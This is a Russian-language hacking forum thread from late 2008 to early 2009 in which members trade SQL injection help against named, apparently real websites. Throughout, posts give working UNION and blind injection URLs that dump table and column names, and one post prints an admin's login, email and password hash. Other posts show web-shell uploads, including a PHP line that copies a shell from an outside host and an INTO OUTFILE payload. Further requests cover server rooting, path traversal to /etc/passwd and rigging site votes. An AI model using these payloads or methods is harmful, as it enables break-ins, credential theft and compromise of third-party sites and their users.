information_schema:TRIGGERS:DEFINER
information_schema:USER_PRIVILEGES:GRANTEE
information_schema:USER_PRIVILEGES:TABLE_CATALOG
information_schema:USER_PRIVILEGES:PRIVILEGE_TYPE
information_schema:USER_PRIVILEGES:IS_GRANTABLE

aka PSIH
28.12.2008, 19:42
ну выводи теперь то что тебе нужно, в чем проблемма?

Thrasher88
28.12.2008, 19:44
У меня пара вопросов по программе SIPT4:
1.Почему в некоторых случаях программа может определить принтабельные поля в инъекции, в других нет? При том что инъекции все простые и одинаковые.
2.Что означает каждая из цифр в поле "принтабельные поля": {2},4,5. Я так понимаю, 4 и 5 - это номер поля, а что означает цифра в фигурных скобках? Но это точно не число принтабельных полей.

Был бы признателен еще если бы кто-нибудь дал линк на подробный мануал по проге (а лучше видео).

Pashkela
28.12.2008, 20:17
в {} принтабельное поле из найденных (мог бы и сам догадаться)

офф. сайт проги - http://dbattack.com/

Любая авто-тулза работает только в так называемых ИДЕАЛЬНЫХ условиях sql-inj, поэтому предпочтительно всё делать ручками, по крайней мере на начальном этапе.

Thrasher88
28.12.2008, 20:32
да нет, по-моему... к примеру, есть {2},4,5 - так вот как раз 4 и 5 это принтабельные поля.. ну во всяком случае у меня всегда это были принтабельные поля.. хз, может совпадало так.
http://dbattack.com/ - уже черт знает сколько не работает.

R1dex
28.12.2008, 20:39
Pashkela правильно сказал, просто ты его недопонял.

{2},4,5 - принтабельные, а конкретно через 2-ое поле, прога будет выводить.

Thrasher88
28.12.2008, 20:48
а, все, ясно спасибо ))
Еще один вопрос по этой проге: если я вручную ввожу принтабельные поля, то обязательно их ВСЕ писать? или достаточно, например, ондного - то, через которое все выводится?

R1dex
29.12.2008, 12:47
Достаточно и одного, главное - заключить поле в скобки.

Sonar_
29.12.2008, 20:12
Как получить голоса на Vkontakte.ru не платив за них?

159932
29.12.2008, 20:30
Как получить голоса на Vkontakte.ru не платив за них?
и как энтот вопрос относится к уязвимостям ??
ну да, конечно возможно есть уязвимость на сайте через которую моно это делать.. но ты думаешь ктонить скажет ? :D тогда уж в раздел покупок пости тему ..

Thrasher88
29.12.2008, 21:27
Подскажите, как обойти.. Нашел скулю:
http://www.myprof.ru/prof.php?id=-1'

Подобрал через ORDER BY чило полей, их 3.
Ввожу:
http://www.myprof.ru/prof.php?id=-1+union+select+1,2,3
Но все равно вылазит ошибка Warning: Invalid argument supplied for foreach() in /home/virtwww/w_myprof-ru_decef7ff/http/prof.php on line 14

F4R
29.12.2008, 21:34
http://www.petarda.ru/default.asp?tmpl=1%27

просто скажите это скуль?

Pashkela
29.12.2008, 21:36
да

-m0rgan-
29.12.2008, 22:02
С чего ты взял?
http://www.petarda.ru/default.asp?tmpl=1'
http://www.petarda.ru/default.asp?tmpl=9999999
http://www.petarda.ru/default.asp?tmpl=blablabla
Выводит одинаковый резулбтак...
Это MS SQL же?
Если я не прав, то обьясните мне...

-m0rgan-
29.12.2008, 22:11
Вот и я так подумал...

F4R
29.12.2008, 22:22
нет, это не скуль
а что это?

F4R
29.12.2008, 22:26
а вот ещё!
http://www.petarda.ru/default.asp?tmpl=search_list&info=gfd&price_from=&price_to=&orderby=price&ordertype=1%27

пишет: "ошибка БД"

уязвимость?

-m0rgan-
29.12.2008, 22:31
F4R, нет.

l1ght
29.12.2008, 23:02
http://www.xyligan.ru/users/eugenie/blog/blog.php?readpost=4233','')
иьект?
https://forum.antichat.ru/showpost.php?p=307103&postcount=1

а вот ещё!
http://www.petarda.ru/default.asp?tmpl=search_list&info=gfd&price_from=&price_to=&orderby=price&ordertype=1%27

пишет: "ошибка БД"

уязвимость?
вообще говоря сортировка меняется
_petarda.ru/default.asp?tmpl=search_list&info=%ED%EE%E2%FB%E9&price_from=0&price_to=9999&orderby=price*1
_petarda.ru/default.asp?tmpl=search_list&info=%ED%EE%E2%FB%E9&price_from=0&price_to=9999&orderby=price*-1
но заюзать багу как говорит Никита Литвинков 50/50 (либо получится, либо нет) ;)

sabe
29.12.2008, 23:04
l1ght
и что? как разкрутить http://www.xyligan.ru/users/eugenie/blog/blog.php?readpost=4233','') там просто нужно закоментировать остальное и составить превельное началало запроса..

Red_Red1
29.12.2008, 23:24
2 Thrasher88
Это PostgreSQL, идем сюда и читаем http://forum.antichat.ru/showthread.php?t=35599
Пробуем
http://www.myprof.ru/prof.php?id=1+union+select+null,null,null--
получилось.
Принтабельные поля по статье найти не удалось, хз почему, но пробуем втупую через имя колонки
/prof.php?id=-1+union+select+TABLE_NAME,null,null+from+informati on_schema.tables--
и вуаля таблички есть :)
Дальше сам, я не рыл

sabe
30.12.2008, 02:50
http://research.sun.com/people/mybio.php?uid=-28941+or+1=1
явахек?))

http://www.thisibelieve.org/dsp_ShowEssay.php?uid=56362+union+select+1,2,3,4,5 ,6,7,8,9,10,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+information _schema.tables/*
логический вывод 5 ветка, что поделать?

http://www.thisibelieve.org/dsp_ShowEssay.php?uid=56362+union+select+1+limit+1 ,1/*
не подбор

Napas
30.12.2008, 12:19
проблема такая,есть скуль с возможностью записи в файл,серв на винде,как можно залить вебшелл? инклуде не работает
и еще,когда записываешь в файл прибавляется такая фигня -

202 537 9.pdf 22042 application/pdf 1
1 2 202\ 537\ 9.pdf\ 22042\ application/pdf\ 1\
[сюда_вставляется_все_что_я_ аписываю_через_скуль]\ 2\ 3\ 4\ 5\ 6\
4 5 6

aka PSIH
30.12.2008, 12:58
Napas
есть скуль с возможностью записи в файл,серв на винде,как можно залить вебшелл?
создавай .php файл:
<?php copy("http://site.com/shell.txt","./papka/na/servere/shell.php"); ?>
выполняй его, и shell.php будет твой шелл ;)

Napas
30.12.2008, 13:05
aka PSIH
не катит (
Warning: copy(D:/Web/cms/xek.php) [function.copy]: failed to open stream: Permission denied in D:\Web\cms\jj.php on line 2
можно ли еще что-нибудь сделать в такой ситуации?

Jokester
30.12.2008, 13:24
sabe
Что вы так боитесь подзапросы, один раз разобраться, и всё станет понятно в дальнейшем
Вот пример(точнее один из вариантов), всё просто
Подбираем таблицу:
http://www.thisibelieve.org/dsp_ShowEssay.php?uid=56362+AND+lower(substring((s elect+table_name+from+information_schema.tables+li mit+17,1),1,11))='admin_users'
Далее, вывод значения:
http://www.thisibelieve.org/dsp_ShowEssay.php?uid=56362+AND+lower(substring((s elect+password+from+admin_users+limit+0,1),1,2))=' mu'Это незаконченный вывод
Добивать не стал. кому нужно разберутся )

Разумеется скриптами всё будет гораздо быстрее чем вручную

vladvk
30.12.2008, 18:39
В админки есть возможность делать запросы к базе
Помогите составить правильно запрос чтобы закачать файл на сервер.
Сори если не туда.

Thrasher88
30.12.2008, 20:12
Нашел очередную скулю на сайте какогото импортного хостера:
http://www.agenciarwebhost.com.br/planos/index.php?id=-1'
Подскажите, как раскрутить? И в чем там вообще проблема?
:)

Gemini12
30.12.2008, 20:28
http://line.kz/reviews/?cat=13&id=www.site.com/view.asp?id=-1+union+select+1,2,3,4,5,6,7,8*+from+msysobjects+i n+'.'
выдает: Îòñóòñòâóåò çíà÷åíèå äëÿ îäíîãî èëè íåñêîëüêèõ òðåáóåìûõ ïàðàìåòðîâ.
кто дальше пробьется?

Jokester
30.12.2008, 21:00
кто дальше пробьется?
А куда дальше-то? Обычная скуль, MSSQL, отлично крутится всё в порядке, никаких аномалий

http://line.kz/reviews/?cat=13&id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATIO N_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('tbl_comp s','all_tovar','allprice','banner'))--

и т.д

H.T.N
30.12.2008, 21:01
я новичек.скажите как достать хеш и чем?

F4R
30.12.2008, 21:05
http://mirinfo.ru/cat/zapas.aspx?num=1'


скуля?

Thrasher88
30.12.2008, 21:14
я новичек.скажите как достать хеш и чем?
откуда? o_O

mailbrush
30.12.2008, 21:32
я новичек.скажите как достать хеш и чем?
Руками.

lexus5122
30.12.2008, 21:40
http://mirinfo.ru/cat/zapas.aspx?num=1'


скуля?

Да. Вроде бы )

F4R
30.12.2008, 22:13
кто раскрутить помогет?

sabe
30.12.2008, 22:19
Thrasher88
фильтрирует...

F4R
заабей... )

юниона нема? (
http://www.hawkingtech.com/downloads.php?file_id=2340+union+select+1/*
иьект у мусаров?
http://rpolice.ru/download.php?file_id=-176+or+1=1

F4R
30.12.2008, 22:45
http://dixis.ru/actions.php?act_id=-347+union+select+1,version(),table_name,4,5,6,7,8, 9,10,11,12+from+information_schema.tables+limit+1, 1%20--

почему ошибка?

R1dex
30.12.2008, 22:59
Для начало - там 13 столбцов...

http://dixis.ru/actions.php?act_id=-347+union+select+1,2,group_concat(table_name,0x3a, table_rows),4,5,6,7,8,9,10,11,12,13+from+informati on_schema.tables--

To sabe:

http://www.hawkingtech.com/downloads.php?file_id=2340+and+substring(version() ,1,1)=3

3-я ветка..

F4R
30.12.2008, 23:35
а как например вывести колонки из IMEI_users ???
http://dixis.ru/actions.php?act_id=-347+union+select+1,2,group_concat(column_name,0x3a ),4,5,6,7,8,9,10,11,12,13+from+information_schema. columns--

R1dex
30.12.2008, 23:48
Вот так.

http://dixis.ru/actions.php?act_id=-347+union+select+1,2,group_concat(column_name),4,5 ,6,7,8,9,10,11,12,13+from+information_schema.colum ns+where+table_name=0x494d45495f7573657273--

Octave_Parango
31.12.2008, 01:11
Всех приветствую.
Подскажите, обязательным ли условием является не экранирование кавычек при заливе шелла при том, что file_priv = Y.
Спасибо!

Grey
31.12.2008, 01:18
Всех приветствую.
Подскажите, обязательным ли условием является не экранирование кавычек при заливе шелла при том, что file_priv = Y.
Спасибо!

Да, но даже при меджик квотс = он можно выкрутиться, вот смотри: https://forum.antichat.ru/showpost.php?p=663815&postcount=39

Меня это спасало не один раз, да и имея возможность читать сорцы сайта, можно найти ещё какую-нидь уязвимость или туже "двойную скулю", но в другом скрипте.

Thrasher88
31.12.2008, 01:41
По-идее при SQL-инъекции в MySQL можно использовать команду UPDATE, так? Подскажите, как тогда будет выглядеть запрос к БД? Примерно так?

http://localhost/index.php?id=-1+update+1,2,3,4,5,6+название_таблиц ы+set+password='admin'+where+id='1'--

l1ght
31.12.2008, 01:46
sql надо изучать с бд, а не с sql-inj тогда не будет таких глупых вопросов :)

diznt
31.12.2008, 01:52
Народ пытаюсь обновить колонку (инфу о юзере) и когда жму на EDIT
то выскакивает редактирование ПУСТЫХ полей! в чем дело??? Прова на запись есть! (раньше редактировал)

l1ght
31.12.2008, 02:13
>update table set a='1',b='2'... where user=1
its maybe successed/access denied

diznt
31.12.2008, 02:30
Вот еще
У меня иногда выскакивает табли4ка в шелле
"Owned by root"
что это?

CRL
31.12.2008, 13:00
С наступающим, думаю то, что я хочу спросить уже обсуждалось кучу раз и видимо поэтому я не знаю по каком тексту ее искать.

Вот пример из квеста m4g'a - http://m4g.ru/quest/lvlvlvl2.php?lang=ru

да, чтобы зайти на второй уровень нужно вот тут http://m4g.ru/quest/lvl1.php в поле пароля что-нибудь вроде ') or ('a'='a ввести.

Так вот значит http://m4g.ru/quest/lvlvlvl2.php?lang=ru
К любому файлу дописывается .php - вопрос - что делать?

Gemini12
01.01.2009, 00:38
Никак не въеду, нашел все таблицы, но при вводе:
http://line.kz/reviews/?cat=13&id=1+or+1=(SELECT+TOP+1+name+from+shopusers)
выдает:
ошибка '80020009'

/reviews/default.asp, line 41


Помогите плз!!!!

zifanchuck
02.01.2009, 02:46
Вот вопрос
нашел сайт подставил ' и выдало
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/l***/l******/pages/price.php on line 77

вот че
наскоко я понисаю ето раскритие путей но може ето скуль??? Кто знает напишите и че с ним делать дальше?

R1dex
02.01.2009, 02:52
Может и скуль. Но информации слишком мало, чтобы понять есть скуль или нет.

Кинь ссылку - скажу точнее.

zifanchuck
02.01.2009, 02:55
спс что отозвался)) значит все-же надежда есть) Пошол ковырять
Ссыль пока не кину ибо хочу сам научиться)

o3,14um
02.01.2009, 03:15
скорее всего скуля

zifanchuck
02.01.2009, 03:47
R1dex
кинул ссілку=)) а то чето непонимаю есть или нет

Thrasher88
02.01.2009, 14:24
Подскажите, как можно обойти ограничение в поиске гугла, когда набираешь, к примеру, inurl: , то можно посмотреть только определенное кол-во страниц.. возможно ли это как то обойти?

iddqd
02.01.2009, 14:26
1)В настройках поиска поставить макс. количество результатов на странице
2)Юзать поиск icq.com

Gemini12
02.01.2009, 14:31
Так че насчет моей проблемы слабо чтоли?

Thrasher88
02.01.2009, 14:50
1)В настройках поиска поставить макс. количество результатов на странице
2)Юзать поиск icq.com
только что попробовал оба метода - везде происходит блокировка после определенного числа показанных ссылок :(

l1ght
02.01.2009, 16:12
слабо чтоли?
с таким отношением тебе врятли кто-то будет отвечать на вопрос, тем более что он поднимается каждую третюю страницу;
поиск заюзать "слабо чтоли" ? трассировка к сайту не идет, предположительно там либо:
1)разные бд
2)нет доступа к _
3)нет записей в _

[Raz0r]
02.01.2009, 16:26
Gemini12, таблица пустая:
http://line.kz/reviews/?cat=13&id=1+or+0=(SELECT+TOP+1+count(*)+FROM+shopusers)

F4R
03.01.2009, 12:16
нашол багу, раскрутить неудаётся помогите плиз)
http://www.ural.tvoe.tv/?page=abonents&id=1188%27

aka PSIH
03.01.2009, 12:22
нашол багу, раскрутить неудаётся помогите плиз)
че там крутить то...
http://www.ural.tvoe.tv/?page=abonents&id=-1+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3,4,5/*
h000153_1_1@localhost:5.0.32-Debian_7etch8-log:h000153_1

o3,14um
03.01.2009, 12:40
че там крутить то...
Если умеешь тока кавычку ставить, то не просто "что там крутить"))))

F4R
03.01.2009, 12:55
http://www.ural.tvoe.tv/?page=abonents&id=-1+union+select+1,column_name,3,4,5+from+informatio n_schema.columns+where+table_name=0x20096e6b735f61 646d696e+limit+1,1%20--

табличка nks_admin
и как я понимаю нету записей?

aka PSIH
03.01.2009, 13:10
табличка nks_admin
и как я понимаю нету записей?



http://www.ural.tvoe.tv/?page=abonents&id=-1+union+select+1,column_name,3,4,5+from+informatio n_schema.columns+where+table_name=char(110,107,115 ,95,97,100,109,105,110)--

http://www.ural.tvoe.tv/?page=abonents&id=-1+union+select+1,concat(id,0x3a,login,0x3a,passwor d,0x3a,email),3,4,5+from+nks_admin--
1:root:741de08d7a4cd7c4:info@nks-euroasia.ru

F4R
03.01.2009, 13:17
http://www.ural.tvoe.tv/?page=abonents&id=-1+union+select+1,column_name,3,4,5+from+informatio n_schema.columns+where+table_name=char(110,107,115 ,95,97,100,109,105,110)--

где можно про это почитать?
я просто такого никогда не видел)

aka PSIH
03.01.2009, 13:22
где можно про это почитать?

про char() ?

char(ASCII,ASCII, ... )

перевести можно тут (http://text.cav.in/) например... ;)

F4R
03.01.2009, 13:44
про char() ?

char(ASCII,ASCII, ... )

перевести можно тут (http://text.cav.in/) например... ;)


ВСЁ ОТЛИЧНО ВСЁ ПОНЯЛ)_)) ОГРОМНОЕ СПС ) ОСОБЕННО ТЕБЕ!

ещё если не сложно подкинька хороших линком на с=татейки про атаки на SQL

Iceangel_
03.01.2009, 14:00
2 F4R
http://forum.antichat.ru/threadnav43966-1-10.html
injection.rulezz.ru

jenyavlg
03.01.2009, 14:15
обьясните чё такое шеллы для чего они нужны и где их брать

gurman94
03.01.2009, 14:55
Всем здрасти...
И так есть шелл на сайте (на выделенном сервере)
так вот как его порутать? нужно полное руководство!

Shadow_p1raT
03.01.2009, 15:31
gurman94,вот отрыл на винте хорошую статейку.Сайта с которого я её копирнул уже нет.

_http://slil.ru/26503661

gurman94
03.01.2009, 15:51
Windows NT WIN-LT7NWBWEQ7D 6.0 build 6001 (то что в uname -a стоит)

под эту версию есть сплоит? просто я на секьюритьси-лаб не нашол
и даже не знаю где искать! в гугле тоже самое!

sharoff
03.01.2009, 21:26
Если будете искать сплойт, не перепутайте с сплойтом для ddos системы...я однажды попался, потом неделю сайт с хорошими пузомерками лежал..выделенный сервер хотел порутать называется.

А насчет сплойтов - на секлабе не будут выкладывать полноценно рабочие, это ведь ресурс о безопасности.

sabe
03.01.2009, 22:03
подскажите как быть) как изменить тип
https://guard.canberra.edu.au/natsem/index.php?mode=download&file_id=900+union+select+null,null,null,null,null, null+from+users--

qazer
03.01.2009, 23:19
http://nismo.ru/phpmyadmin/tbl_create.php кто поможет зайти вот сюда?

Pashkela
04.01.2009, 00:05
подскажите как быть) как изменить тип

Нет скули, вообще

Octave_Parango
04.01.2009, 01:13
Приветствую.
Подскажите, можно ли залить шелл через phpMyAdmin?
Если сморозил глупость, sorry (:

Jokester
04.01.2009, 01:52
Нет скули, вообщеСкуль есть.

sabe
Ты хочешь добится вывода? Ищи дркгой параметр, сдесь помоему глухо, похоже она слепая

Octave_Parango
SELECT '<?php system($c) ?>' FROM `table` INTO OUTFILE '/полный/путь/shell.php'

[Raz0r]
04.01.2009, 01:56
Можно, при условии что у тебя есть доступ к выполнению произвольных SQL-команд и пользователь MySQL имеет привилегию FILE.
Вот статья по теме:
https://forum.antichat.ru/showthread.php?p=437118
Также в некоторых версиях phpMyAdmin есть уязвимости, с помощью которых можно залить шелл.
http://letmegooglethatforyou.com/?q=phpmyadmin%20exploit

ElteRUS
04.01.2009, 02:04
sabe, это Oracle. Мне приходилось иметь дело с этой субд (в плане проведения инъекций) к сожалению безрезультатно (наверно я такой тупой). На античате есть статьи по сабжу

https://forum.antichat.ru/thread7157-%E8%ED%FA%E5%EA%F6%E8%FF+Oracle.html

https://forum.antichat.ru/thread7158-%E8%ED%FA%E5%EA%F6%E8%FF+Oracle.html

https://forum.antichat.ru/thread8009-%E8%ED%FA%E5%EA%F6%E8%FF+Oracle.html

Статьи на мой взгляд отвратительные. Вообще не читабельно (имхо). Еще есть мини статья от Подкащея вроде, но там все сбито в одну кучу. Просто так сказать некоторые особенности субд.

Желаю удачи

[Raz0r]
04.01.2009, 02:40
ElteRUS ты видимо не заметил отличную статью от [53x]Shadow по Oracle
http://forum.antichat.ru/showthread.php?t=40576

prescott
04.01.2009, 04:20
http://lada-auto.ru/cgi-bin/models.pl?model_id=6295171+union+select+1,null,to_ char(213),null+from+sys.dual--%20&branch=tth Помогите с ORACLE инъекцией. Не могу подобрать тип данных для третьего столбца. В чем ошибка?

j0ker13
04.01.2009, 09:11
при запросе index.php4?lang=1' выдает ошибку
Warning: main(lang/inc.lang1'.php): failed to open stream
при таком запросе index.php4?lang=/../../../../../../../../../../../../../etc/passwd%00 ошибка
Warning: main(lang/inc.lang/../../../../../../../../../../../../../etc/passwd
как я понял он не может найти папку inc.lang(( как правильно составить?))

o3,14um
04.01.2009, 10:01
j0ker13. Такого файла нет, в НИКСах вылазит ошибка (может не во всех). Если бы была винда. то ты бы смог прочесть файл

j0ker13
04.01.2009, 10:47
to o3,14um а смысле нет файла?)) если ты про ошибку то я сам перевел что он ругается на отсуствие файла) разве это не иньект?
мне кажется что он не может найти папку которую я указал выше) т.к. своим запросом исковеркал ее имя))

o3,14um
04.01.2009, 11:53
Это какбы файл должен быть атким:
lang/inc.lang1.php

НО ты изменил запрос на
lang/inc.lang/
и теперь имя файла воспринимается как папка, которой не существует. Успез зависит от оси и от других папок, расположенный в этой папке=)

Если там сеть папка, с началом названия inc.lang то те повезло

j0ker13
04.01.2009, 12:13
2Iceangel_ ога)
2o3,14um вот и я про тоже)
кароч вот http://nouveauniveau.com/index.php4?lang=1'

prescott
04.01.2009, 12:28
http://lada-auto.ru/cgi-bin/models.pl?model_id=6295171+union+select+1,null,to_ char(213),null+from+sys.dual--%20&branch=tth Помогите с ORACLE инъекцией. Не могу подобрать тип данных для третьего столбца. В чем ошибка?

Еще раз спрошу

F4R
04.01.2009, 13:26
http://eroking.ru/podr.php?gid=2827%27

как раскрутить?

l1ght
04.01.2009, 14:11
http://eroking.ru/podr.php?gid=2827%27

как раскрутить?
_eroking.ru/podr.php?gid=2827'+and+ascii(substring((select+tab le_name+from+information_schema.tables+limit+1),1, 1))=67--
Еще раз спрошу
там даже при повторной выборке этого столбца несовместимость типа данных ) копай через другие скрипты

F4R
04.01.2009, 14:59
eroking.ru/podr.php?gid=2827'+and+ascii(substring((select+tab le_name+from+information_schema.tables+limit+1),1, 1))=67--

никанает (((

Jokester
04.01.2009, 15:19
никанает (((Ещё как канает
http://eroking.ru/podr.php?gid=2827'+and+ascii(substring((select+tab le_name+from+information_schema.tables+limit+1),1, 1))=67+--+

PS F4R , Мне кажется пора прочитать что-то по скулям. а не просто постить линки с ковычкой и вопросом "как раскрутить"

F4R
04.01.2009, 15:53
да там просто страница с вагиной открывается и всё)

bons
04.01.2009, 17:34
Ещё как канает
http://eroking.ru/podr.php?gid=2827'+and+ascii(substring((select+tab le_name+from+information_schema.tables+limit+1),1, 1))=67+--+

PS F4R , Мне кажется пора прочитать что-то по скулям. а не просто постить линки с ковычкой и вопросом "как раскрутить"

там рядом есть инъекция с выводимыми полями
http://eroking.ru/list.php?grp=-1'+union+select+1,2,3,4--+0

R1dex
04.01.2009, 17:46
да там просто страница с вагиной открывается и всё)

Это как раз и означает, что все "канает".

Почитай статьи, многие вопросы отпадут.

http://forum.antichat.ru/thread43966.html
http://forum.blackhack.ru/showthread.php?p=2141

F4R
04.01.2009, 18:34
спс обоим +

DeepBlue7
05.01.2009, 00:25
Подскажите, что за версия форума phpbb.... http://forum.muo.lv/ .. и если можно то сплоит в придачу. =)

F4R
05.01.2009, 00:30
тут смотрел как определить?
http://forum.antichat.ru/thread24488.html

DeepBlue7
05.01.2009, 00:54
Лан... на это забить можно... )

Новый вопрос.... юзаж этот сплоит... http://www.milw0rm.com/exploits/2033 вроде все ок... пишет типа резаультаты в txt файл записаны, а никаких файлов на C: не появляется... в чем дело ? мож чот не так делаю ?? Версия форума ipb 2.1.6....

DeepBlue7
05.01.2009, 01:12
Все... нашел )

waik
05.01.2009, 01:19
У меня проблема.Видел здесь на ачате скрипт чтоб рейтинг поднять на ачате,но мне не надо на ачате .Есть форум там стоит vBulletin® версия 3.7.2. Пытался немного переделать скрипт чтоб он начал крутить на форуме котором я хочу но нечего не выходит .кто знает как накрутить репу вот на етом форуме forum.travian.ru

sabe
05.01.2009, 06:29
Pashkela
скуля есть. небыло бы не выкладывал

jokester
надеялся, но так и думал.. ну как видеш сайт не очень параменистый))

ElteRUS
спс знаю что такое оракл)

[Raz0r]
хорошая статья

что это за хешш? )
ymlZqn3.fIgZ.
Ac3Jckx5.O.4I

Shaitan-Devil
05.01.2009, 11:09
Похоже на DES.

z00MAN
05.01.2009, 11:22
Похоже на DES.
хм, а разве знаки не различные должны быть в DES?

sabe
06.01.2009, 08:08
http://www.yvec.com/innerpage.php?cat_id=-3+union+select+1/*
неподбор

o3,14um
06.01.2009, 13:21
sabe, там 2 запроса с разным кол-вом колумнов

.Striker
06.01.2009, 16:00
нашол на одном форуме ипб
в тег [img] если прописать
[ img]http://site.com/folder/script%00.jpg[ /img]
то адрес картинки получается в подписи http://site.com/folder/script
можно из этого сделать активную xss?

geforce
06.01.2009, 20:32
Помогите! Это инъекция???


http://dom2.ru/heroes/1697'

z00MAN
06.01.2009, 20:40
Помогите! Это инъекция???


http://dom2.ru/heroes/1697'
нет

geforce
06.01.2009, 20:49
нет
А что это тогда????

geforce
06.01.2009, 20:56
это ошибка какая-то

И как ею можно воспользоваться?

geforce
06.01.2009, 21:24
никак

Как никак! Если запрос http://dom2.ru/heroes/1697' проходит и переменая $hero.name не проверяется вот и по этому она выводится! так как она пустая функция echo выводит её не как переменю а как текст! Пример echo ("$hero.name"); из этого следует что запрос к базе прошел!!! Я не прав?

MatriX30000
06.01.2009, 21:31
скажите пожалуйсто а рейтинг в контакте имеет уязвимости???

SVAROG
06.01.2009, 21:32
MatriX30000 попробуй кавычку подставить